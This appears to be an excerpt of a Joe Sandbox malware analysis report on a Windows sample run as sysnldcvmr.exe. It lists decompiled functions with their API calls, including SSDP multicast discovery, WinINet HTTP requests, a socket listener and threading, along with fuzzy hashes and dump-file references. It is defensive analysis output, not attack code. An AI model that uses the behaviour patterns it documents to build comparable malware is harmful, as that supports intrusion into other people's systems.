Opcode Fuzzy Hash: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99

Function 00408A90 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 00408A9E
_allshl.NTDLL ref: 00408AAD
_allshl.NTDLL ref: 00408ABC
_allshl.NTDLL ref: 00408ACB
_allshl.NTDLL ref: 00408ADA

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5

Function 00406320 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384

Strings

\??\, xrefs: 00406378

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99

Function 00407310 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,?,?), ref: 00407338
CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
CloseHandle.KERNEL32(00000000), ref: 00407361

Strings

.ou, xrefs: 00407361

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CloseCreateHandleThreadmemcpy
String ID: .ou
API String ID: 2064604595-3683031111
Opcode ID: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
Opcode Fuzzy Hash: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59

Function 0040E770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
CloseHandle.KERNEL32(000000FF), ref: 0040E7B2

Strings

.ou, xrefs: 0040E7B2

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID: .ou
API String ID: 1378416451-3683031111
Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
Opcode Fuzzy Hash: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
Opcode Fuzzy Hash: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28

Function 00406FE0 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
SysAllocString.OLEAUT32(00416268), ref: 00406FF3
CoUninitialize.OLE32 ref: 00407018

Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248

SysFreeString.OLEAUT32(00000000), ref: 00407012

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID:
API String ID: 459949847-0
Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56

Function 00407030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0

SysFreeString.OLEAUT32(00000000), ref: 00407248

Strings

Microsoft Corporation, xrefs: 004071B6

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
Opcode Fuzzy Hash: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66

Function 0040D980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7

Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1

SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
SysFreeString.OLEAUT32(00000000), ref: 0040DA65

Strings

%S%S, xrefs: 0040DA46

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
Opcode Fuzzy Hash: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5

Function 0040D640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A

Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805

Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65

Strings

UDP, xrefs: 0040D6D8
TCP, xrefs: 0040D6BB

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A

Function 0040D250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
CloseHandle.KERNEL32(?), ref: 0040D2A9

Strings

.ou, xrefs: 0040D2A9

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CloseHandleObjectSingleWait
String ID: .ou
API String ID: 528846559-3683031111
Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95

Function 00405EB0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
Opcode Fuzzy Hash: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

Analysis Process: sysnldcvmr.exePID: 7744, Parent PID: 7668COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1444
Total number of Limit Nodes:	26

Executed Functions

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
Opcode Fuzzy Hash: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A

Function 0040D710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
htons.WS2_32(0000076C), ref: 0040D760
inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D

Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18

bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805

Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E

Strings

239.255.255.250, xrefs: 0040D76A

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250
API String ID: 726339449-2186272203
Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
